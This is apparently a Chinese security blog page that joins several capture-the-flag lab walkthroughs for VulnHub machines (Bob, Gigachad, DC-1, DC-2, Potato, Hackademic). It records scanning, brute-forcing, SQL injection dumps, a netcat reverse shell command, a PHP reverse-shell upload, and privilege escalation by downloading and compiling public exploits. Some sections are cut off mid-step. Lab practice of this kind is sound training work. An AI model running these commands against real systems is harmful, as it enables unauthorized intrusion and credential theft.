Category - web安全

首先,扫描一下。

image-20240328100907741

目录扫描下,发现有个robots.txt,然后发现还有个dev_shell.php页面

image-20240328101040061

  1. nc -lnvp 1234//kali开启监听
  1. 网页执行该命令
  2. ip a&nc -e /bin/sh 192.168.2.138 1234
  1. python -c 'import pty; pty.spawn("/bin/bash")'
  2. cd /home/bob
  3. cat .old_passwordfile.html
  4. <html>
  5. <p>
  6. jc:Qwerty
  7. seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
  8. </p>
  9. </html>
  10. su - jc
  11. Qwerty//成功登陆

image-20240328080953574

  1. cd /home/bob/Documents
  2. ls -al
  3. file login.txt.gpg

image-20240328081211153

发现这边有个gpg加密文件

  1. gpg --output login.txt --decrypt /home/bob/Documents/login.txt.gpg

继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?

14

16

  1. bob:b0bcat_
  2. //解密得到的用户名和密码

然后ssh登陆上,发现他有sudo的权限,直接获得flag

image.png

靶机地址:http://www.vulnhub.com/entry/gigachad-1,657/

首先,解决虚拟机无法分配ip

在启动界面按e

将此处的ro quiet替换为rw signie init=/bin/bash

image-20240325133909393

  1. cat /etc/network/interfaces
  2. nano /etc/network/interfaces
  3. /etc/init.d/networking restart

然后修改下网卡配置文件,将enp0s3改为ens33

image-20240325134418267

  1. nmap -sV -sC -A -p- 192.168.2.161

使用kali进行扫描

image-20240325134503500

根据nmap的信息,存在ftp匿名登陆

  1. ftp 192.168.2.161//存在匿名登陆,账户:ftp
  2. ftp> ls//随后发现有个文件,将它get下来
  3. ftp> get chadinfo

image-20240325134656116

  1. cat chadinfo
  2. file chadinfo
  3. unzip chadinfo
  4. cat chadinfo

image-20240325134712025

image-20240325134816592

这边有点没看懂为啥,搜了下别人的解析

image-20240325134834385

  1. ssh chad@192.168.2.161
  2. cat user.txt//成功得到第一个flag

image-20240325134911966

  1. find / -perm -u=s -type f 2>/dev/null //命令将尝试查找具有root权限的SUID的文件
  2. chad@gigachad:/tmp$ s-nail -V
  3. v14.8.6

image-20240325134947988

  1. searchsploit s-nail
  2. cd /tmp
  3. searchsploit -m 47172
  4. scp /tmp/47172.sh chad@192.168.2.161:/tmp

版本号也符合要求

  1. chmod 777
  2. ./47172.sh//多执行几次就成功了
  3. id
  4. cd /root
  5. cat root.txt//得到第二个flag

image-20240325135118639

一、开始渗透

1.1 获取一下靶机ip

  1. nmap -sn 192.168.2.1/24

title

1.2 扫描靶机端口和服务

  1. nmap -sV -sC -A -p- 192.168.2.196

title
目标计算机开放80端口、7744端口

1.3 漏洞利用

1.3.1 先去访问一下80端口的网页,看看有些什么

如果访问不了,可以去host文件那里修改一下本地解析

  1. vim /etc/hosts

title
打开网页就能直接看到flag1
它提示我要用下cewl工具

1.3.2 flag2

  1. cewl http://dc-2 -w passwd.txt

继续搜集点信息

  1. whatweb http://dc-2
  2. dirb http://dc-2

title
title
很明显有个wp-admin的登陆网页
title
了解到有一个专门针对wordpress的工具wpscan
得到了三个用户admin、jerry、tom

  1. wpscan --url http://dc-2 --enumerate u //枚举用户
  2. wpscan --url http://dc-2 --passwords passwd.txt

title
先前cewl有生成字典,使用wpscan进行暴力破解
title
jerry和tom的密码成功爆了出来,对wp-admin进行下登陆
jerry / adipiscing
tom / parturient
用jerry登陆进去后直接就找到了flag2
title

1.3.3 flag3

还有个7744端口的ssh可以利用,尝试下这两个用户能否登陆进去
jerry没有成功,但tom可以

  1. tom@DC-2:~$ ls
  2. flag3.txt usr
  3. tom@DC-2:~$ cat flag3.txt
  4. -rbash: cat: command not found

不能用cat打开

  1. compgen -c //列出当前可执行命令 有个less
  2. less flag3.txt

title

1.3.4 flag4

发现ls能列出home目录,然后还能直接用less查看flag4.txt

  1. tom@DC-2:~$ ls /home

一、开始渗透

1.1 获取一下靶机ip

  1. nmap -sn 192.168.2.1/24

title

1.2 扫描靶机端口和服务

  1. nmap -sV -sC -A -p- 192.168.2.196

title
目标计算机开放22端口、80端口、111端口、34023端口

1.3 漏洞利用

1.3.1 先去访问一下80端口的网页,看看有些什么

title
顺便用whatweb扫描下

  1. whatweb -v http://192.168.2.196

title

1.3.2 使用msfconsole工具

  1. search drupal
  2. use 2
  3. set rhosts 192.168.2.196
  4. exploit
  5. shell
  6. python -c 'import pty; pty.spawn("/bin/bash")' //实现简单tty

//上次步骤做了一部分,没做完,接来下我再mac电脑上远程kali接着做
title
title
成功得到了flag1

  1. 提示说Drupal有个配置文件,我们搜索下
  2. www-data@DC-1:/var/www$ find . -name "set*"
  3. find . -name "set*"
  4. ./sites/default/settings.php //成功找到

得到了flag2以及mysql账户密码
title

1.3.3 数据库

  1. mysql -udbuser -pR0ck3t
  2. use drupaldb;select * from users\G

title
用脚本得到加密后的密码
title
修改下admin和Fred的密码,然后登陆网页就能发现flag3

  1. www-data@DC-1:/var/www$ /var/www/scripts/password-hash.sh 666
  2. /var/www/scripts/password-hash.sh 666
  3. password: 666 hash: $S$DOekGKJKkcoC0BbfqdNyekSMUlD9KlwCqRgw6SPRBYAXM2i6N3j9
  4. www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t
  5. mysql -udbus

一、开始渗透

1.1 获取一下靶机ip

  1. nmap -sn 192.168.2.1/24

title

1.2 扫描靶机端口和服务

  1. nmap -sV -sC -A -p- 192.168.2.115

title
发现有个80的http服务和7120的ssh服务

1.3 漏洞利用

1.3.1先去访问一下80端口的网页,看看有些什么

发现就一个马铃薯
title
使用dirb扫描一下

  1. dirb http://192.168.2.115

title
title
得到了系统版本号
回想起还有个ssh服务开着
使用hydra爆破下

  1. hydra -l potato -P rockyou.txt -V ssh://192.168.2.115:7120 //这边之前看了眼别人的所以知道用户名是potato,建议还是把用户名也爆破下,当然这取决于你的字典是否强大
  2. hydra -L user.txt -P top1000.txt -vV ssh://192.168.11.131:7120 -f

title

使用获取到的用户名密码登陆一下

  1. ssh potato@192.168.2.115 -p7120

title

1.3.2 内核提权

  1. searchsploit ubuntu 3.13
  2. searchsploit -m 37292 //这边直接选择了第一个
  3. python3 -m http.server 80 //把当前目录开启个http服务

title
回到刚才的potato

  1. cd /tmp
  2. wget http://192.168.2.115/37292.c
  3. gcc -o exp 37292.c
  4. ./exp
  5. id
  6. cat /root/proof.txt

title
随便找个md5网站解密下
title

一、开始渗透

1.1 获取一下kali的IP网卡信息和靶机ip

  1. ifconfig
  2. arp-scan-l

title

1.2 扫描靶机端口和服务

  • 扫描开放端口

    nmap -p- 192.168.111.130

    title

  • 确定端口服务和漏洞

    nmap -sV -sC 192.168.111.130
    title

1.3 漏洞利用

1.3.1 先去访问一下80端口的网页,看看有些什么
title
提示需要获取root权限和root目录下的key.txt,然后还发现有几个链接可以点击,点一下
title
下面两个链接都试一下手动注入,发现第二个存在sql漏洞。
title
1.3.2 使用sqlmap工具

  1. sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" --current-db --batch
  2. sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch
  3. sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
  4. sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump --batch

title
title
title
title
1.3.3 使用目录扫描

  1. dirsearch -u "http://192.168.111.130/Hackademic_RTB1/"

发现有个wp-admin的子目录
title
1.3.4 寻找上传点
发现GeorgeMiller用户有配置选项,开启文件上传,启用后可以看到右边多了个"upload"
title
1.3.5 使用kali自带的php反弹shell
修改为kali的ip
title
上传文件后,开启监听,访问webshell
title
发现权限不够,想办法提权
1.3.6

1. 更新kali源为国内源,会快一些,打开软件源文件

  1. nano /etc/apt/sources.list

2. 将官方源替换成如下任意一个即可:

  1. #中科大
  2. deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
  3. deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
  4. #阿里云
  5. deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
  6. deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
  7. #清华大学
  8. deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
  9. deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
  10. #浙大
  11. deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
  12. deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

3. 进行系统更新,先取回更新的软件包列表信息

  1. apt--get update

如报错:
Err:1 http://mirrors.ustc.edu.cn/kali kali-rolling InRelease Could not resolve
or
Err:1 http://kali.mirror.garr.it/mirrors/kali kali-rolling InRelease
The following signatures were inv

    Page 2 of 2